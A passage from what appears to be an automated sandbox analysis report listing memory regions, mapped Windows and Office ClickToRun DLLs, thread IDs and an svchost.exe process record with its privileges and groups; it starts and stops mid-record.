= 14458 start_va = 0x7ffbfa7b0000 end_va = 0x7ffbfa8defff entry_point = 0x7ffbfa7b0000 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 14459 start_va = 0x7ffbfa8e0000 end_va = 0x7ffbfa915fff entry_point = 0x7ffbfa8e0000 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 14460 start_va = 0x7ffbfa920000 end_va = 0x7ffbfaa09fff entry_point = 0x7ffbfa920000 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 14461 start_va = 0x7ffbfaa10000 end_va = 0x7ffbfaa26fff entry_point = 0x7ffbfaa10000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14462 start_va = 0x7ffbfaa30000 end_va = 0x7ffbfab1efff entry_point = 0x7ffbfaa30000 region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 14463 start_va = 0x7ffbfab20000 end_va = 0x7ffbfabc5fff entry_point = 0x7ffbfab20000 region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 14464 start_va = 0x7ffbfabd0000 end_va = 0x7ffbfad0efff entry_point = 0x7ffbfabd0000 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 14465 start_va = 0x7ffbfad10000 end_va = 0x7ffbfad84fff entry_point = 0x7ffbfad10000 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 14466 start_va = 0x7ffbfae30000 end_va = 0x7ffbfaeb1fff entry_point = 0x7ffbfae30000 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 14467 start_va = 0x7ffbfaec0000 end_va = 0x7ffbfb2a9fff entry_point = 0x7ffbfaec0000 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 14468 start_va = 0x7ffbfb2b0000 end_va = 0x7ffbfb2bbfff entry_point = 0x7ffbfb2b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 14469 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 14470 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 14471 start_va = 0x7ffbfb550000 end_va = 0x7ffbfb88cfff entry_point = 0x7ffbfb550000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 14472 start_va = 0x7ffbfb890000 end_va = 0x7ffbfb905fff entry_point = 0x7ffbfb890000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 14473 start_va = 0x7ffbfb910000 end_va = 0x7ffbfb941fff entry_point = 0x7ffbfb910000 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 14474 start_va = 0x7ffbfb950000 end_va = 0x7ffbfb9ecfff entry_point = 0x7ffbfb950000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 14475 start_va = 0x7ffbfb9f0000 end_va = 0x7ffbfba06fff entry_point = 0x7ffbfb9f0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 14476 start_va = 0x7ffbfba10000 end_va = 0x7ffbfba36fff entry_point = 0x7ffbfba10000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 14477 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 14478 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 14479 start_va = 0x7ffbfc740000 end_va = 0x7ffbfc831fff entry_point = 0x7ffbfc740000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 14480 start_va = 0x7ffbfcde0000 end_va = 0x7ffbfcdf7fff entry_point = 0x7ffbfcde0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14481 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 14482 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 14483 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 14484 start_va = 0x7ffbfd340000 end_va = 0x7ffbfd355fff entry_point = 0x7ffbfd340000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14485 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14486 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14487 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 14488 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 14489 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14490 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14491 start_va = 0x7ffbffc40000 end_va = 0x7ffbffcb3fff entry_point = 0x7ffbffc40000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 14492 start_va = 0x7ffbffcc0000 end_va = 0x7ffbffcc9fff entry_point = 0x7ffbffcc0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 14493 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 14494 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14495 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14496 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 14497 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 14498 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14499 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14500 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 14501 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 14502 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14503 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14504 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14505 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14506 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14507 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14508 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 14509 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 14510 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14511 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 14512 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 14513 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 14514 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14515 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14516 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14517 start_va = 0x7ffc01630000 end_va = 0x7ffc01636fff entry_point = 0x7ffc01630000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 14518 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14519 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14520 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 14521 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14522 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14523 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14524 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14525 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14526 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14527 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 14528 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14529 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14530 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14531 start_va = 0x7ffc03ad0000 end_va = 0x7ffc03ad7fff entry_point = 0x7ffc03ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 14532 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14533 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14534 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14535 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1349 os_tid = 0x84 Thread: id = 1350 os_tid = 0x66c Thread: id = 1351 os_tid = 0x830 Thread: id = 1352 os_tid = 0x844 Thread: id = 1353 os_tid = 0x6bc Thread: id = 1354 os_tid = 0x568 Thread: id = 1355 os_tid = 0x564 Thread: id = 1356 os_tid = 0x55c Thread: id = 1357 os_tid = 0x550 Thread: id = 1358 os_tid = 0x54c Thread: id = 1359 os_tid = 0x540 Thread: id = 1360 os_tid = 0x508 Thread: id = 1361 os_tid = 0x504 Thread: id = 1362 os_tid = 0x500 Thread: id = 1363 os_tid = 0x4fc Thread: id = 1364 os_tid = 0x4f4 Thread: id = 1365 os_tid = 0x4e8 Process: id = "292" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49544000" os_pid = "0x608" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xa], "NT SERVICE\\tiledatamodelsvc" [0xe], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00014125" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 15836 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15837 start_va = 0x8c00000000 end_va = 0x8c0fffffff entry_point = 0x0 region_type = private name = "private_0x0000008c00000000" filename = "" Region: id = 15838 start_va = 0x8c10000000 end_va = 0x8c1fffffff entry_point = 0x0 region_type = private name = "private_0x0000008c10000000" filename = "" Region: id = 15839 start_va = 0x8c73940000 end_va = 0x8c7394ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73940000" filename = "" Region: id = 15840 start_va = 0x8c73950000 end_va = 0x8c73950fff entry_point = 0x8c73950000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 15841 start_va = 0x8c73960000 end_va = 0x8c73973fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73960000" filename = "" Region: id = 15842 start_va = 0x8c73980000 end_va = 0x8c739fffff entry_point = 0x0 region_type = private name = "private_0x0000008c73980000" filename = "" Region: id = 15843 start_va = 0x8c73a00000 end_va = 0x8c73a03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73a00000" filename = "" Region: id = 15844 start_va = 0x8c73a10000 end_va = 0x8c73a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73a10000" filename = "" Region: id = 15845 start_va = 0x8c73a20000 end_va = 0x8c73a21fff entry_point = 0x0 region_type = private name = "private_0x0000008c73a20000" filename = "" Region: id = 15846 start_va = 0x8c73a30000 end_va = 0x8c73a3ffff entry_point = 0x8c73a30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15847 start_va = 0x8c73a40000 end_va = 0x8c73a4ffff entry_point = 0x8c73a40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15848 start_va = 0x8c73a50000 end_va = 0x8c73a5ffff entry_point = 0x8c73a50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15849 start_va = 0x8c73a60000 end_va = 0x8c73a6ffff entry_point = 0x8c73a60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15850 start_va = 0x8c73a70000 end_va = 0x8c73a7ffff entry_point = 0x8c73a70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15851 start_va = 0x8c73a80000 end_va = 0x8c73a8ffff entry_point = 0x8c73a80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15852 start_va = 0x8c73a90000 end_va = 0x8c73a9ffff entry_point = 0x8c73a90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15853 start_va = 0x8c73aa0000 end_va = 0x8c73aaffff entry_point = 0x8c73aa0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15854 start_va = 0x8c73ab0000 end_va = 0x8c73ab6fff entry_point = 0x0 region_type = private name = "private_0x0000008c73ab0000" filename = "" Region: id = 15855 start_va = 0x8c73ac0000 end_va = 0x8c73ac0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73ac0000" filename = "" Region: id = 15856 start_va = 0x8c73ad0000 end_va = 0x8c73ad0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73ad0000" filename = "" Region: id = 15857 start_va = 0x8c73ae0000 end_va = 0x8c73ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73ae0000" filename = "" Region: id = 15858 start_va = 0x8c73af0000 end_va = 0x8c73afffff entry_point = 0x8c73af0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15859 start_va = 0x8c73b00000 end_va = 0x8c73bfffff entry_point = 0x0 region_type = private name = "private_0x0000008c73b00000" filename = "" Region: id = 15860 start_va = 0x8c73c00000 end_va = 0x8c73cbdfff entry_point = 0x8c73c00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15861 start_va = 0x8c73cc0000 end_va = 0x8c73cc7fff entry_point = 0x8c73cc0000 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 15862 start_va = 0x8c73cd0000 end_va = 0x8c73cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73cd0000" filename = "" Region: id = 15863 start_va = 0x8c73ce0000 end_va = 0x8c73ce0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73ce0000" filename = "" Region: id = 15864 start_va = 0x8c73cf0000 end_va = 0x8c73cf0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73cf0000" filename = "" Region: id = 15865 start_va = 0x8c73d00000 end_va = 0x8c73d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d00000" filename = "" Region: id = 15866 start_va = 0x8c73d10000 end_va = 0x8c73d1ffff entry_point = 0x0 region_type = pagefile_backed name = 